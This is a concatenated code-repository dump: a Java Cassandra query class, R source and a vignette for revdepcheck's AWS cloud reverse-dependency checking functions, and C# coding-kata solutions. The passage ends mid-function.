usuario_nome=row.getString("usuario_nome");
nota=row.getDouble("avaliacao");*/
av= new Avaliacao(estabelecimento_id,row.getUUID("avaliacao_id"),row.getString("estabelecimento_nome"),row.getString("estabelecimento_descricao"),row.getString("usuario_nome"),row.getDouble("avaliacao"));
L_av.add(av);
}
return L_av;
}
public Tupla<String, Double> buscarAvaliacao2(UUID estabelecimento_id){
ResultSet results = session.execute("SELECT avaliacao FROM avaliacao "
+ "WHERE id="+estabelecimento_id+";");
Tupla<String, Double> t=null;
for (Row row : results) {
String nome;
double avaliacao;
t= new Tupla<String, Double>();
List<TupleValue> tuplas=row.getList("avaliacao",new TypeToken<TupleValue>(){
private static final long serialVersionUID = 1L;});
nome=tuplas.get(0).getString(0);
avaliacao=tuplas.get(0).getDouble(1);
t.put(nome, avaliacao);
//tuplas.remove(0);
//System.out.format("% %s\n", row.getMap("avaliacao", String.class, double.class));
}
return t;
}
//perguntas disponíveis em um estabelecimento
public boolean buscarTipoAvaliacao(UUID estabelecimento_id){
ResultSet results = session.execute("SELECT estabelecimento_descricao,avaliacao_descricao FROM tipoAvaliacao "
+ "WHERE estabelecimento_id="+estabelecimento_id+";");
boolean has=false;
for (@SuppressWarnings("unused") Row row : results) {
has=true;
// System.out.format("%s %s\n", row.getString("estabelecimento_descricao"), row.getList("avaliacao_descricao",String.class));
}
return has;
}
//delete
//update
}
| 738b30225f2a9aa7f99c544c87fab4dbd2ec9b22 | [
"Markdown",
"Java"
] | 5 | Java | matheus0392/BDG_Cassandra | 26fdb28ee5cd26f74eef28df14bfbd70a8282e0d | c5daa91076b4a14a08b58c03d61436ed9db986a4 |
refs/heads/main | <repo_name>cderv/revdepcheck<file_sep>/R/cloud.R
#' Monitor the status of a cloud job
#'
#' The format of the status bar is
#' `[jobs_queued/jobs_running/jobs_succeeded/jobs_failed - total_jobs] time_elapsed | ETA: estimate_time_remaining`
#'
#' @param update_interval The number of seconds between querying for updates
#' @family cloud
#' @importFrom cli cli_format cli_status_update col_green col_blue col_red
#' style_bold cli_status_clear cli_status cli_alert
#' @inheritParams cloud_report
#' @export
cloud_status <- function(job_name = cloud_job(), update_interval = 10) {
status_id <- cli_status("Status of {.val {job_name}}")
info <- cloud_job_info(job_name)
started_time <- as.POSIXct(info$started_timestamp, tz = "UTC", format="%Y-%m-%dT%H:%M:%OS")
cloud_status_check <- function(job_name) {
status <- cloud_job_status(job_name)
if (length(status) == 0) {
stop("No job with Id: '", job_name, call. = FALSE)
}
size <- status$size
results <- unlist(status$statusSummary)
if (!is.integer(results)) {
return(NA)
}
names(results) <- tolower(names(results))
results <- results[c("pending", "runnable", "starting", "running", "succeeded", "failed")]
num_completed <- sum(results[c("succeeded", "failed")])
num_queued <- sum(results[c("pending", "runnable")])
num_running <- sum(results[c("starting", "running")])
current_time <- Sys.time()
elapsed <- hms::as_hms(as.integer(difftime(current_time, started_time, units = "secs")))
eta <- calc_eta(started_time, current_time, num_running, num_completed, size)
status_bar_text <- "[{num_queued}/{col_blue(num_running)}/{col_green(results[['succeeded']])}/{col_red(results[['failed']])} - {.strong {size}}] {elapsed} | ETA: {eta}"
if (results[["failed"]] > 0) {
cli_status_clear(id = status_id, result = "failed", msg_failed = paste0("{.emph FAILED}: ", status_bar_text))
cli_alert("run {.fun cloud_summary} for interactive results")
cli_alert("run {.fun cloud_report} for markdown reports")
return(FALSE)
}
if (num_completed == length(info$revdep_packages)) {
cli_status_clear(id = status_id, result = "done", msg_done = paste0("{.emph SUCCEEDED}: ", status_bar_text))
cli_alert("run {.fun cloud_summary} for interactive results")
cli_alert("run {.fun cloud_report} for markdown reports")
return(TRUE)
}
cli::cli_status_update(id = status_id, status_bar_text)
return(NA)
}
while(is.na(res <- cloud_status_check(job_name))) {
Sys.sleep(update_interval)
}
return(invisible(res))
}
calc_eta <- function(creation_time, current_time, running, completed, total) {
if (completed >= total) {
return("Done")
}
infinity <- "\U221E"
if (running == 0) {
return(infinity)
}
time_diff <- as.integer(difftime(current_time, creation_time, units = "secs"))
to_go <- total - completed
secs_to_go <- time_diff / completed * to_go
if (secs_to_go == Inf) {
return(infinity)
}
prettyunits::pretty_sec(secs_to_go)
}
#' Fetch results from the cloud
#'
#' Intended mainly for internal and expert use. This function when needed by
#' [cloud_report()] and `[cloud_summary()]`, so it is unlikely you will need to
#' call it explicitly.
#'
#' @keywords internal
#' @family cloud
#' @inheritParams cloud_report
#' @importFrom curl new_handle handle_setheaders new_pool multi_add multi_run handle_setopt
#' @importFrom cli cli_progress_bar cli_progress_update cli_progress_done pb_percent
#' @export
cloud_fetch_results <- function(job_name = cloud_job(pkg = pkg), pkg = ".") {
pkg <- pkg_check(pkg)
cloud <- dir_find(pkg, "cloud")
info <- cloud_job_info(job_name)
out_dir <- file.path(cloud, job_name)
dir.create(out_dir, showWarnings = FALSE, recursive = TRUE, mode = "0744")
rel_out_dir <- sub(paste0(pkg_check(pkg), "/"), "", out_dir, fixed = TRUE)
cli_alert_info("Syncing results to {.file {rel_out_dir}}")
packages <- info$revdep_packages
out_files <- file.path(out_dir, paste0(packages, ".tar.gz"))
to_download <- !file.exists(out_files)
pb <- cli_progress_bar(format = "Downloading package results: {pb_percent}", total = sum(to_download))
handle_success <- function(res) {
if (res$status_code >= 400) {
out_file <- sprintf("%s/%s.tar.gz", out_dir, basename(dirname(res$url)))
unlink(out_file)
}
cli_progress_update(id = pb)
}
pool <- new_pool()
for (i in which(to_download)) {
out_file <- out_files[[i]]
package <- packages[[i]]
url <- sprintf("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com/staging/check/%s/packages/%s/results.tar.gz", job_name, package)
handle <- new_handle()
handle_setopt(handle, url = enc2utf8(url))
handle_setheaders(handle, "x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY"), Accept = "application/x-gzip")
multi_add(handle = handle, done = handle_success, pool = pool, data = out_file)
}
out <- multi_run(pool = pool)
cli_progress_done(id = pb)
to_extract <- file.exists(out_files) & !dir.exists(file.path(out_dir, packages))
pb2 <- cli_progress_bar(format = "Extracting package results: {pb_percent}", total = sum(to_extract))
for (i in which(to_extract)) {
out_file <- out_files[[i]]
utils::untar(out_file, exdir = out_dir)
cli_progress_update(id = pb2)
}
cli_progress_done(id = pb2)
}
#' Submit a reverse dependency checking job to the cloud
#'
#' @param tarball A pre-built package tarball, if `NULL` a tarball will be
#' automatically built for the package at `pkg` by [pkgbuild::build()].
#' @param revdep_packages A character vector of packages to check, if `NULL`
#' equal to [cran_revdeps()]
#' @param r_version The R version to use.
#' @returns The AWS Batch job-id
#' @inheritParams revdep_check
#' @importFrom cli cli_alert_info cli_alert_success cli_alert_danger
#' @importFrom httr GET PATCH POST stop_for_status add_headers content
#' @family cloud
#' @export
cloud_check <- function(pkg = ".", tarball = NULL, revdep_packages = NULL, r_version = "4.0.3") {
if (is.null(tarball)) {
pkg <- pkg_check(pkg)
tarball <- pkgbuild::build(path = pkg)
}
package_name <- desc::desc_get_field("Package", file = tarball)
package_version <- as.character(desc::desc_get_version(file = tarball))
# Lookup revdeps with R, as the RSPM db seems not quite right, for instance
# it seems to include archived packages.
if (is.null(revdep_packages)) {
revdep_packages <- setdiff(cran_revdeps(package_name), package_name)
}
post_response <- POST("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com/staging/check",
config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
body = list(
package_name = package_name,
package_version = package_version,
revdep_packages = revdep_packages,
r_version = r_version
),
encode = "json"
)
cloud_stop_for_status(post_response)
post_content <- content(post_response)
presigned_url <- post_content[["_source_presigned_url"]]
job_name <- post_content[["id"]]
cli_alert_success("Creating cloud job {.arg job_name}: {.val {job_name}}")
cli_alert_info("Uploading {.file {tarball}}")
curl::curl_upload(tarball, presigned_url, verbose = FALSE)
cli_alert_success("Uploaded {.file {tarball}}")
cli_alert_info("Spawning batch job for cloud job {.arg job_name}: {.val {job_name}}")
patch_response <- PATCH("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com",
config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
path = paste0("staging/check", "/", job_name),
body = list(status = "running"),
encode = "json"
)
cloud_stop_for_status(patch_response)
patch_content <- content(patch_response)
job_name <- patch_content$id
cli_alert_success("Created job {.arg job_name}: {.val {job_name}}")
cli_alert("Run {.fun cloud_status} to monitor job status")
cloud_job(job_name = job_name)
cloud <- dir_find(pkg, "cloud")
out_dir <- file.path(cloud, job_name)
dir.create(out_dir, showWarnings = FALSE, recursive = TRUE, mode = "744")
cloud_job(job_name)
invisible(job_name)
}
#' Cancel a running cloud run
#'
#' @inheritParams cloud_report
#' @family cloud
#' @export
cloud_cancel <- function(job_name = cloud_job()) {
patch_response <- PATCH("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com",
config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
path = paste0("staging/check", "/", job_name),
body = list(status = "cancelled"),
encode = "json"
)
cloud_stop_for_status(patch_response)
}
#' @importFrom httr status_code content headers http_status
cloud_stop_for_status <- function(response) {
if (status_code(response) < 300) {
return()
}
heads <- headers(response)
res <- content(response)
status <- status_code(response)
msg <- c(
paste0("Cloud error (", status, "): ", http_status(status)$reason),
paste0("Message: ", res$invalid_values %||% res$message)
)
call <- sys.call(-1)
cond <- structure(list(
message = paste0(msg, collapse = "\n")
),
class = c(
"cloud_error",
paste0("http_error_", status),
"error",
"condition"
))
stop(cond)
}
cloud_check_result <- function(check_log, description, dependency_error) {
check_dir <- dirname(check_log)
if (!file.exists(check_log)) {
return(structure(
list(
stdout = character(),
timeout = FALSE,
status = -1L,
rversion = NA_character_,
platform = NA_character_,
errors = NA_character_,
warnings = NA_character_,
notes = NA_character_,
description = description$str(normalize = FALSE),
package = description$get("Package"),
version = description$get("Version")[[1]],
cran = description$get_field("Repository", "") == "CRAN",
bioc = description$has_fields("biocViews"),
checkdir = check_dir,
test_fail = rcmdcheck:::get_test_fail(check_dir),
install_out = rcmdcheck:::get_install_out(check_dir),
type = "cloud"
),
class = "rcmdcheck"
)
)
}
stdout <- brio::read_file(check_log)
# Fix invalid characters
stdout <- iconv(stdout, "UTF-8", "UTF-8", sub = "bytes")
# Strip \r
stdout <- gsub("\r\n", "\n", stdout, fixed = TRUE)
entries <- strsplit(paste0("\n", stdout), "\n\\*+[ ]")[[1]][-1]
notdone <- function(x) grep("^DONE", x, invert = TRUE, value = TRUE)
res <- structure(
list(
stdout = stdout,
timeout = FALSE,
status = if (isTRUE(dependency_error)) -1L else 0L,
rversion = rcmdcheck:::parse_rversion(entries),
platform = rcmdcheck:::parse_platform(entries),
errors = notdone(grep("ERROR\n", entries, value = TRUE)),
warnings = notdone(grep("WARNING\n", entries, value = TRUE)),
notes = notdone(grep("NOTE\n", entries, value = TRUE)),
description = description$str(normalize = FALSE),
package = description$get("Package"),
version = description$get("Version")[[1]],
cran = description$get_field("Repository", "") == "CRAN",
bioc = description$has_fields("biocViews"),
checkdir = check_dir,
test_fail = rcmdcheck:::get_test_fail(check_dir),
install_out = rcmdcheck:::get_install_out(check_dir),
type = "cloud"
),
class = "rcmdcheck"
)
res
}
cloud_compare <- function(pkg) {
desc_path <- file.path(pkg, "DESCRIPTION")
description <- desc::desc(file = desc_path)
old <- file.path(pkg, "old", paste0(basename(pkg), ".Rcheck"), "00check.log")
new <- file.path(pkg, "new", paste0(basename(pkg), ".Rcheck"), "00check.log")
dependency_path <- file.path(pkg, "dependency_install.log")
dependency_error <- any(grep("ERROR: .*is not available for package", readLines(dependency_path, warn = FALSE))) || !(file.exists(old) && file.exists(new))
old <- cloud_check_result(old, description, dependency_error)
new <- cloud_check_result(new, description, dependency_error)
if (isTRUE(dependency_error)) {
res <- rcmdcheck_error(description$get("Package"), old, new)
res$version <- description$get("Version")[[1]]
return(res)
}
rcmdcheck::compare_checks(old, new)
}
#' Display revdep results
#'
#' Displays nicely formatted results of processed packages run in the cloud.
#' @inheritParams cloud_report
#' @family cloud
#' @export
cloud_summary <- function(job_name = cloud_job(pkg = pkg), pkg = ".") {
results <- cloud_results(job_name = job_name, pkg = pkg)
structure(
results,
class = "revdepcheck_results"
)
}
#' Display detailed revdep results from a cloud run
#'
#' @param revdep Name of the revdep package
#' @inheritParams cloud_report
#' @family cloud
#' @export
cloud_details <- function(job_name = cloud_job(pkg = pkg), revdep, pkg = ".") {
pkg <- pkg_check(pkg)
cloud <- dir_find(pkg, "cloud")
res <- cloud_compare(file.path(cloud, job_name, revdep))
class(res) <- "revdepcheck_details"
res
}
#' Markdown report of reverse dependency check results from the cloud
#'
#' You can use these functions to get intermediate reports of a running cloud check.
#' @inheritParams revdep_report_summary
#' @param results Results from [cloud_results()]. Expert use only.
#' @param job_name The job name, as returned by [cloud_check()].
#' @param failures Save failures to disk?
#' @inheritParams revdep_report
#' @family cloud
#' @export
cloud_report <- function(job_name = cloud_job(pkg = pkg), pkg = ".", file = "", all = FALSE, results = NULL, failures = TRUE) {
pkg <- pkg_check(pkg)
root <- dir_find(pkg, "root")
if (is.null(results)) {
results <- cloud_results(job_name, pkg)
}
cli_alert_info("Generating reports")
cli_alert_info("Writing summary to {.file revdep/README.md}")
cloud_report_summary(file = file.path(root, "README.md"), all = all, results = results, pkg = pkg)
cli_alert_info("Writing problems to {.file revdep/problems.md}")
cloud_report_problems(file = file.path(root, "problems.md"), all = all, results = results, pkg = pkg)
if (failures) {
cli_alert_info("Writing failures to {.file revdep/failures.md}")
cloud_report_failures(file = file.path(root, "failures.md"), results = results, pkg = pkg)
} else {
unlink(file.path(root, "failures.md"))
}
cli_alert_info("Writing CRAN comments to {.file cran.md}")
revdep_report_cran(file = file.path(root, "cran.md"), results = results, pkg = pkg)
invisible()
}
#' @rdname cloud_report
#' @export
cloud_report_summary <- function(job_name = cloud_job(pkg = pkg), file = "", all = FALSE, pkg = ".", results = NULL) {
if (is.null(results)) {
results <- cloud_results(job_name, pkg)
}
if (is_string(file) && !identical(file, "")) {
file <- file(file, encoding = "UTF-8", open = "w")
on.exit(close(file), add = TRUE)
opts <- options("crayon.enabled" = FALSE)
on.exit(options(opts), add = TRUE)
}
cat_header("Revdeps", file = file)
revdeps <- report_revdeps(pkg = pkg, all = all, results = results)
status <- revdeps$status
n_issues <- revdeps$issues
revdeps$status <- revdeps$issues <- NULL
failed <- !(status %in% c("+", "-"))
broken <- status == "-"
if (!all) {
broken <- broken & n_issues > 0
}
revdep_report_section("Failed to check", revdeps[failed, ], file = file)
revdep_report_section("New problems", revdeps[broken, ], file = file)
if (all) revdep_report_section("All", revdeps, file = file)
invisible()
}
#' @rdname cloud_report
#' @export
cloud_report_problems <- function(job_name = cloud_job(pkg = pkg), pkg = ".", file = "", all = FALSE, results = NULL) {
if (is.null(results)) {
results <- cloud_results(job_name, pkg)
}
revdep_report_problems(pkg = pkg, file = file, all = all, results = results)
}
#' @rdname cloud_report
#' @export
cloud_report_failures <- function(job_name = cloud_job(pkg = pkg), pkg = ".", file = "", results = NULL) {
if (is.null(results)) {
results <- cloud_results(job_name, pkg)
}
revdep_report_failures(pkg = pkg, file = file, results = results)
}
#' @rdname cloud_report
#' @export
cloud_report_cran <- function(job_name = cloud_job(pkg = pkg), pkg = ".", results = NULL) {
if (is.null(results)) {
results <- cloud_results(job_name, pkg)
}
revdep_report_cran(pkg = pkg, results = results)
}
#' Retrieve cloud results
#'
#' Intended for expert use only, this can be used as input to the [cloud_report()] and other functions.
#' @inheritParams cloud_report
#' @family cloud
#' @keywords internal
#' @export
cloud_results <- function(job_name = cloud_job(pkg = pkg), pkg = ".") {
pkg <- pkg_check(pkg)
cloud <- dir_find(pkg, "cloud")
cloud_fetch_results(job_name, pkg = pkg)
cli_alert_info("Comparing results")
pkgs <- list.dirs(file.path(cloud, job_name), full.names = TRUE, recursive = FALSE)
pb <- cli_progress_bar(format = "Processing package results: {pb_percent} ({basename(pkg)})", total = length(pkgs))
out <- lapply(pkgs, function(pkg) {
cli_progress_update(id = pb)
cloud_compare(pkg)
})
cli_progress_done(id = pb)
out
}
#' @inheritParams cloud_report
#' @inherit revdep_email
#' @export
cloud_email <- function(type = c("broken", "failed"), job_name = cloud_job(pkg = pkg), pkg = ".", packages = NULL, draft = FALSE) {
type <- match.arg(type)
package_results <- cloud_results(job_name, pkg)
if (!is.null(packages)) {
to_keep <- map_lgl(package_results, function(x) x$package %in% packages)
package_results <- package_results[to_keep]
}
status <- map_chr(package_results, rcmdcheck_status)
cond <- switch(type,
broken = status %in% c("-", "t-", "i-"),
failed = status %in% c("i+", "t+")
)
revdep_email_by_type(pkg, package_results[cond], type, draft = draft)
invisible()
}
#' Return the current cloud job
#'
#' The `job_name` is automatically set by [cloud_check()] and is remembered for
#' the duration of the current R session. If there is no active `job_name`, but
#' there are local cloud check results, `job_name` is inferred from the most
#' recently modified cloud check results.
#'
#' @param job_name If not `NULL`, sets the active `job_name` to the input.
#' @inheritParams cloud_report
#' @export
cloud_job <- function(job_name = NULL, pkg = ".") {
cloud_data$job_name <- job_name %||% cloud_data$job_name
if (!is.null(cloud_data$job_name)) {
return(invisible(cloud_data$job_name))
}
pkg <- pkg_check(pkg)
cloud <- dir_find(pkg, "cloud")
if (dir.exists(cloud)) {
cloud_dirs <- list.dirs(cloud, recursive = FALSE)
} else {
cloud_dirs <- character()
}
if (length(cloud_dirs) < 1) {
stop("Can't find any previous `cloud_check()` results locally, can't discover `job_name`", call. = FALSE)
}
latest <- cloud_dirs[which.max(file.info(cloud_dirs)$mtime)]
cloud_data$job_name <- basename(latest)
cli_alert_success("Most recent cloud job {.arg job_name}: {.val {cloud_data$job_name}}")
invisible(cloud_data$job_name)
}
cloud_data <- new.env(parent = emptyenv())
list_job_to_tbl <- function(x, status) {
if (length(x$jobSummaryList) == 0) {
return(
data.frame(
name = character(),
index = integer(),
created = .POSIXct(double()),
started = .POSIXct(double()),
stopped = .POSIXct(double()),
status = character(),
stringsAsFactors = FALSE
)
)
}
data.frame(
name = x$jobSummaryList$jobId,
index = x$jobSummaryList$arrayProperties$index,
created = .POSIXct(x$jobSummaryList$createdAt / 1000),
started = .POSIXct(x$jobSummaryList$startedAt / 1000),
stopped = .POSIXct(x$jobSummaryList$stoppedAt / 1000),
status = status,
stringsAsFactors = FALSE
)
}
#' Plot the running time per package of a cloud job
#'
#' @inheritParams cloud_report
#' @family cloud
#' @export
cloud_plot <- function(job_name = cloud_job()) {
job_info <- cloud_job_info(job_name)
packages <- data.frame(
index = seq_along(job_info$revdep_packages) - 1,
package = unlist(job_info$revdep_packages),
stringsAsFactors = FALSE
)
succeeded <- list_job_to_tbl(cloud_job_status(job_name, "SUCCEEDED"), "succeeded")
failed <- list_job_to_tbl(cloud_job_status(job_name, "FAILED"), "failed")
data <- rbind(succeeded, failed)
data <- merge(data, packages)
data$package <- forcats::fct_reorder(data$package, data$stopped, .desc = TRUE)
ggplot2::ggplot(data) +
ggplot2::geom_segment(
ggplot2::aes(
y = package,
yend = ggplot2::after_stat(y),
x = hms::as_hms(started - created),
xend = hms::as_hms(stopped - created),
color = status
)
) +
ggplot2::scale_color_manual(values = c("succeeded" = "darkgrey", "failed" = "red")) +
ggplot2::scale_y_discrete(guide = ggplot2::guide_axis(check.overlap = TRUE)) +
ggplot2::guides(color = "none") +
ggplot2::labs(x = NULL, y = NULL) +
ggplot2::theme(
panel.grid.major.y = ggplot2::element_blank(),
panel.grid.minor.y = ggplot2::element_blank()
)
}
utils::globalVariables(c("package", "y", "started", "created", "stopped"))
cloud_job_info <- function(job_name = cloud_job()) {
response <- GET("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com",
config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
path = paste0("staging/check", "/", job_name),
encode = "json"
)
cloud_stop_for_status(response)
content(response, simplifyVector = TRUE)
}
cloud_job_status <- function(job_name = cloud_job(pkg = pkg), status = c("ALL", "RUNNING", "SUBMITTED", "PENDENG", "RUNNABLE", "STARTING", "RUNNING", "SUCCEEDED", "FAILED"), pkg = ".") {
status <- match.arg(status)
if (status == "ALL") {
status <- ""
} else {
status <- paste0("/", status)
}
response <- GET("https://xgyefaepu5.execute-api.us-east-1.amazonaws.com",
config = add_headers("x-api-key" = Sys.getenv("RSTUDIO_CLOUD_REVDEP_KEY")),
path = paste0("staging/check", "/", job_name, "/", "status", status),
encode = "json"
)
stop_for_status(response)
content(response)
}
#' Get the batch job ID for a checked package
#'
#' @inheritParams cloud_report
#' @export
cloud_job_mapping <- function(job_name = cloud_job()) {
info <- cloud_job_info(job_name)
tibble::tibble(package = info$revdep_packages, id = seq_along(info$revdep_packages) - 1)
}
#' Retrieve the names broken or failed packages
#'
#' Broken packages are those whose checks got worse with the dev version.
#' Failed packages are those whose cloud jobs failed, either because the spot
#' instance was shut down by AWS or because the checks used too much memory and
#' were killed.
#' @inheritParams cloud_report
#' @param install_failures Whether to include packages that failed to install.
#' @param timeout_failures Whether to include packages that timed out.
#' @family cloud
#' @returns A character vector with the names of broken packages, to be passed to `cloud_check()`.
#' @export
cloud_broken <- function(job_name = cloud_job(pkg = pkg), pkg = ".", install_failures = FALSE, timeout_failures = FALSE) {
results <- cloud_results(job_name = job_name, pkg = pkg)
broken <- map_lgl(results, is_broken, install_failures, timeout_failures)
map_chr(results[broken], `[[`, "package")
}
#' @rdname cloud_broken
#' @export
cloud_failed <- function(job_name = cloud_job(pkg = pkg), pkg = ".") {
unlist(cloud_job_status(job_name, status = "FAILED")$packages)
}
#' Browse to the AWS url for the job
#'
#' This is useful for closer inspection of individual jobs while they are
#' running or after the fact.
#' @param package If `NULL` browses to the URL of the overall job. If a package
#' name, browses to the URL for that specific package job.
#' @inheritParams cloud_report
#' @export
cloud_browse <- function(job_name = cloud_job(), package = NULL) {
info <- cloud_job_info(job_name)
job_id <- info$batch_job_id
if (is.null(package)) {
utils::browseURL(sprintf("https://console.aws.amazon.com/batch/home?region=us-east-1#/jobs/%s", job_id))
return(invisible())
}
mapping <- cloud_job_mapping(job_id)
array_num <- mapping$id[mapping$package == package]
utils::browseURL(sprintf("https://console.aws.amazon.com/batch/home?region=us-east-1#/jobs/%s/child/%s:%i", job_id, job_id, array_num))
}
<file_sep>/vignettes/cloud.Rmd
---
title: "cloud"
output: rmarkdown::html_vignette
vignette: >
%\VignetteIndexEntry{cloud}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
comment = "#>"
)
```
```{r setup}
library(revdepcheck)
```
# Running reverse dependencies in the cloud
revdepcheck now supports running reverse dependencies in the AWS cloud, via a suite a functions all prefixed with `cloud_*()`.
This service is currently only available to be used by RStudio employees, but we hope to offer this service for the broader R community in the future.
## Setup
Set the `RSTUDIO_CLOUD_REVDEP_KEY` environment variable to the value of your cloud authentication key, provided to you by RStudio DevOps.
Add this key to your `.Renviron` file with `usethis::edit_r_environ()` and restart R.
## Usage
**Note** If you are going to be running 500+ tests and are using a development dependency (e.g. `Remote: org/pkg`) you may exhaust the GitHub API limits. A workaround is to use a 'url' remote, e.g. `Remote: url::https://github.com/org/pkg/archive/master.tar.gz`, which does not use the GitHub API.
```r
# Kickoff a new check
# The devel package is automatically built from the current
# working directory, or specify a pre-built package with `tarball`.
cloud_check()
# Follow current status of the job
cloud_status()
# Cancel a job
cloud_cancel()
# Retrieve results (if needed) and show a summary
cloud_summary()
# Retrieve results (if needed) and generate a markdown report
cloud_report()
# Retrieve details of a specfic package
cloud_details(, "pkgXYZ")
# Plot running time for each package in a job
cloud_plot()
# Email maintainers with failures
cloud_email()
# Retrieve packages that broke in a given job
cloud_broken()
# Open a web browser to the AWS job pane for the current job
cloud_browse()
# Open the browser to the AWS job for a particular package
# Useful for debugging why a particular job failed
cloud_browse(package = "xyz")
```
The functions all keep track of the most recently submitted `job_id`, so assuming you only have one job in a given R session you can call the functions without additional parameters.
Provide the `job_id` explicitly otherwise, results write to `revdep/{job_id}`.
The `cloud_*()` functions assume your current working directory is in the root directory of the package you are trying to run reverse dependencies for.
If this is not the case all `cloud_*()` functions take a `pkg` parameter, so you can specify a different directory if needed.
| 30eb33b9f7963b89c4891738f74f983a1ee0ff68 | [
"R",
"RMarkdown"
] | 2 | R | cderv/revdepcheck | 1ba55f7d592091ea529e31be99dbde0d822d6dd1 | 385d3650b394720705e8105c50ebd9260255a28c |
refs/heads/master | <repo_name>SamuelBourdon/seven_minutes_workout<file_sep>/helpers/page_helper.rb
module PageHelper
def page_title(page = current_page)
page.data.title_seo ? page.data.title_seo : page.data.title || data.settings.site.title
end
def page_description(page = current_page)
page.data.description ? page.data.description : data.settings.site.description
end
def page_url(page = current_page)
data.settings.site.url + page.url
end
end<file_sep>/README.md
# Seven Minutes Workout
Application adaptée du livre AngularJS by example
## Modifications
* Contenu de l'app en français
* Intégration d'AngularJS dans Middleman
## License
This project is free software, and may be redistributed under [MIT license].
| e68d476df0bf776956bc3e5598e3ef8e10a358b6 | [
"Markdown",
"Ruby"
] | 2 | Ruby | SamuelBourdon/seven_minutes_workout | 3a22036f53a7259c46438c48beadcdce9be2c899 | d2a76a6917e18b21cca67447094c7d9e6fc0ac77 |
refs/heads/master | <repo_name>gsach20/Kata<file_sep>/ConsoleApplication1/ConsoleApplication1/FactDecomp.cs
using System;
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
class FactDecomp
{
public static string Decomp(int n)
{
List<Pair<int, int>> primeNumCount = new List<Pair<int, int>>();
primeNumCount.Add(new Pair<int, int>(2, 0));
for (int i = 1; i <= n; i++)
DecompNum(i, primeNumCount);
return primeNumCount.Select(p => p.PrimeNumber.ToString() + (p.Count > 1 ? "^" + p.Count : ""))
.Aggregate((curr, next) => curr + " * " + next);
}
private static void DecompNum(int number, List<Pair<int, int>> primeNumCount)
{
foreach (Pair<int, int> pair in primeNumCount)
{
pair.Count += GetFactor(ref number, pair.PrimeNumber);
if(number == 1) return;
}
do
{
Pair<int, int> nextPrimeNumber = GetNextPrimeNumber(primeNumCount);
nextPrimeNumber.Count += GetFactor(ref number, nextPrimeNumber.PrimeNumber);
} while (number != 1);
}
private static Pair<int, int> GetNextPrimeNumber(List<Pair<int, int>> primeNumCount)
{
for(int current = primeNumCount.Last().PrimeNumber + 1;; current++)
{
bool isPrime = true;
foreach (Pair<int, int> pair in primeNumCount)
{
if (current % pair.PrimeNumber == 0)
{
isPrime = false;
break;
}
}
if (isPrime)
{
Pair<int, int> pair = new Pair<int, int>(current, 0);
primeNumCount.Add(pair);
return pair;
}
}
}
private static int GetFactor(ref int number, int primeNumber)
{
int count = 0;
do
{
if (number % primeNumber != 0) break;
count++;
number = number / primeNumber;
} while (true);
return count;
}
public class Pair<T, U> {
public Pair(T primeNumber, U count) {
PrimeNumber = primeNumber;
Count = count;
}
public T PrimeNumber { get; set; }
public U Count { get; set; }
}
}
[TestFixture]
public class FactDecompTest
{
private static void testing(int n, string expected)
{
Console.WriteLine("n: {0}, expected: {1}", n, expected);
Assert.AreEqual(expected, FactDecomp.Decomp(n));
}
[Test]
public static void test()
{
testing(17, "2^15 * 3^6 * 5^3 * 7^2 * 11 * 13 * 17");
testing(5, "2^3 * 3 * 5");
testing(22, "2^19 * 3^9 * 5^4 * 7^3 * 11^2 * 13 * 17 * 19");
testing(14, "2^11 * 3^5 * 5^2 * 7^2 * 11 * 13");
testing(25, "2^22 * 3^10 * 5^6 * 7^3 * 11^2 * 13 * 17 * 19 * 23");
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/TotalAreaCoveredByRectangles.cs
using System;
using System.Collections.Generic;
using System.Linq;
using Castle.Components.DictionaryAdapter;
using NUnit.Framework;
using static NUnit.Framework.Assert;
namespace ConsoleApplication1
{
class TotalAreaCoveredByRectangles
{
private const int X1 = 0;
private const int Y1 = 1;
private const int X2 = 2;
private const int Y2 = 3;
public static int Calculate(IEnumerable<int[]> rectangles)
{
List<int[]> rectanglesList = rectangles.OrderBy(r => r[X1]).ToList();
return CheckRemaining(rectanglesList, 0);
}
private static int CheckRemaining(List<int[]> rectangles, int currentIndex)
{
int remainingCount = rectangles.Count - currentIndex;
if (remainingCount == 0) return 0;
int[] rectangle1 = rectangles[currentIndex];
int rectangle1Area = (rectangle1[X2] - rectangle1[X1]) * (rectangle1[Y2] - rectangle1[Y1]);
if (remainingCount == 1) return rectangle1Area;
int nextIndex = currentIndex + 1;
List<int[]> intersectionRectangles = new List<int[]>();
foreach (var rectangle2 in rectangles.Skip(nextIndex))
{
if (rectangle2[X1] >= rectangle1[X2]) break;
int y1, y2;
if (IntersectionCordinates(rectangle1[Y1], rectangle1[Y2], rectangle2[Y1], rectangle2[Y2], out y1, out y2) > 0)
{
intersectionRectangles.Add(new[] { rectangle2[X1], y1, rectangle2[X2] <= rectangle1[X2] ? rectangle2[X2] : rectangle1[X2], y2 });
}
}
int netArea = rectangle1Area - CheckRemaining(intersectionRectangles, 0);
netArea += CheckRemaining(rectangles, nextIndex);
return netArea;
}
private static int IntersectionCordinates(int bottom1, int top1, int bottom2, int top2, out int bottom, out int top)
{
if (bottom2 >= bottom1)
{
if (bottom2 >= top1)
{
bottom = 0;
top = 0;
return 0;
}
bottom = bottom2;
top = top2 <= top1 ? top2 : top1;
}
else
{
if (top2 <= bottom1)
{
bottom = 0;
top = 0;
return 0;
}
bottom = bottom1;
top = top1 <= top2 ? top1 : top2;
}
return top - bottom;
}
}
class TotalAreaCoveredByRectangles3
{
private const int X1 = 0;
private const int Y1 = 1;
private const int X2 = 2;
private const int Y2 = 3;
public static int Calculate(IEnumerable<int[]> rectangles)
{
